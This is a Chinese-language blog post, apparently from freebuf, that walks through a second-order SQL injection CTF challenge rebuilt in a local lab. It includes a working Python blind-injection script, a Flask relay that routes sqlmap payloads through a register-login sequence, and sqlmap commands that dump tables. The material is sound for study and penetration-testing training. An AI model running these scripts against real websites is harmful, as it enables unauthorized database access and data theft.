SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx

前言

在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞，并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀，我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外，有没有一个比较优雅的解决方案呢？

一道CTF题的思考

先来说说“张三的网站”这道题目，因为我手上没有题目源码，所以就根据记忆中的各个功能自己写了一个（很少写php，代码很烂），相关代码已经上传到GitHub，见文章底部。
该题目主要涉及3个页面：

1. 登陆页面
   
2. 注册页面
3. 登陆后的主页

题目中的登陆页面、注册页面均无SQL注入漏洞，但是登陆后的主页在用户名处存在SQL注入漏洞。要利用此漏洞，需要在注册页面控制用户名，邮箱使用随机数生成的邮箱，密码随意，然后使用邮箱和注册时的密码登陆，登陆成功后跳转到主页，此时触发SQL注入漏洞。
注册名为“123”的用户：

注册名为“123’”的用户：

以下是一个Python脚本手工注入的解法：

import requests
import random
import re
import string

proxy = {'http': '127.0.0.1:8080'}
session = requests.session()


def register(username, email, password='123'):
    burp0_url = "http://192.168.154.130:80/web/register.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)


def login(email, password='123'):
    burp0_url = "http://192.168.154.130:80/web/login.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"email": email, "pw": password, "submit": ''}
    r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 跳转首页
    burp0_url = "http://192.168.154.130/web/index.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Referer": "http://a434051f6c184741b1ede6b610a15f805a546b5b172748e9.changame.ichunqiu.com/login.php", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    
    r2 = session.get(burp0_url, headers=burp0_headers, proxies=proxy)
    if r2.status_code == 302:
        print('username payload no work')
    elif r2.status_code == 200:
        pattern = '''<span class="user-name">(.+?)</span>'''
        try:
            userr = re.findall(pattern, r2.text, re.DOTALL)[0]
            if userr:
                return True
            else:
                return False
        except:
            return False




def main():
    key = string.ascii_lowercase + string.digits + '{}_-'
    flag = ''
    for keynum in range(1, 43):
        for s in key:
            username = r"""'or(substr((select e.a from (select (select 1)a union select * from flag)e limit 2 offset 1) from {0} for 1) = '{1}') and '1""".format(keynum, s)
            email = '{}@qq.com'.format(int(random.random() * 10000000))
            register(username, email)
            if login(email):
                flag += s
                print('key: ' + flag)
                break
       
    
if __name__ == "__main__":
    main()

如果对ctf不熟悉的朋友应该会很懵，因为语句中直接查询获取了flag表中的内容，而正常情况下，我们是不知道真正的flag在上面表，这样的解法我个人觉得不具备通用性，当然了在ctf比赛中是很高效的。

那么，有没有可能通过sqlmap来进行注入呢？显然，直接使用sqlmap不进行二次开发是无法检测出注入点的，因为sqlmap的注入逻辑不支持多个数据包的逻辑处理。于是我在想有无一种办法，拿到sqlmap的注入检测payload，然后我们通过Python编写相应的请求逻辑，再把响应结果返回到sqlmap呢？答案是可行的！

Flask中转sqlmap注入

代码实现的结构如下，首先创建一个flask服务，接收payload参数的值，然后传入函数custom_fun中，custom_fun函数由自己编写请求逻辑，把payload参数的值填入到存在注入点的参数中，然后发起请求，把最终响应结果return就行。最后通过sqlmap检测URL：http://127.0.0.1:5000/?payload=1即可，可以适当调整sqlmap的注入参数，比如–level、–risk、–technique等。

from flask import Flask
from flask import request
import requests
import random

def custom_fun(payload):
    return ''

app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        payload = request.args.get('payload')
    elif  request.method == 'POST':
        payload = request.form.get('payload')
    return custom_fun(payload)

def main():
    app.run(host='127.0.0.1', debug=True)


if __name__ == "__main__":
    main()

流程示意图如下：

完整注入过程

先来看看本例的实现代码：

from flask import Flask
from flask import request
import requests
import random


def custom_fun(payload):
    email = '{}@qq.com'.format(int(random.random() * 10000000))
    username = payload
    password = '123'
    proxy = {'http': '127.0.0.1:8080'}
    session = requests.session()
    # 注册
    burp0_url = "http://192.168.154.130:80/web/register.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 登陆
    burp0_url = "http://192.168.154.130:80/web/login.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"email": email, "pw": password, "submit": ''}
    r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 登陆后跳转到首页
    burp0_url = "http://192.168.154.130/web/index.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    
    resp = session.get(burp0_url, headers=burp0_headers, proxies=proxy)    
    resp.encoding = resp.apparent_encoding
    return resp.text

app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        payload = request.args.get('payload')
    elif  request.method == 'POST':
        payload = request.form.get('payload')
    return custom_fun(payload)



def main():
    app.run(host='127.0.0.1', debug=True)


if __name__ == "__main__":
    main()

从代码上可以看到，只需要把请求逻辑写到custom_fun函数中，把最终结果的响应包return给flask，剩下的就可以交给sqlmap了，优雅！

这里说一个小技巧，可以使用Burp的拓展Copy As Python-Requests来一键把burp的请求复制为Python requests请求：

然后使用sqlmap测试一下，因为是通过本地flask中转，我们的sqlmap的target应该是本地的flask服务端口，命令如下：
sqlmap -u http://127.0.0.1:5000/?payload=1
检测时flask服务的输出：

成功检测到注入点：

当前数据库：
sqlmap -u http://127.0.0.1:5000/?payload=1 –current-db

跑表名：
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test –tables

跑flag表数据：
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test -T flag –dump

小结

Flask中转sqlmap注入并非本人原创，互联网上已有前辈发表过相关的案例，这里以一个ctf题目作为案例，来更加优雅地进行SQL注入。挖洞是不可能挖洞的，这辈子都不可能挖洞的，手工注入又不会，只能靠sqlmap，才能维持得了生活这样子…

测试环境代码：
GitHub：https://github.com/ryanInf/fakeZhangSan

来源：freebuf.com 2020-07-21 11:35:04 by: r0yanx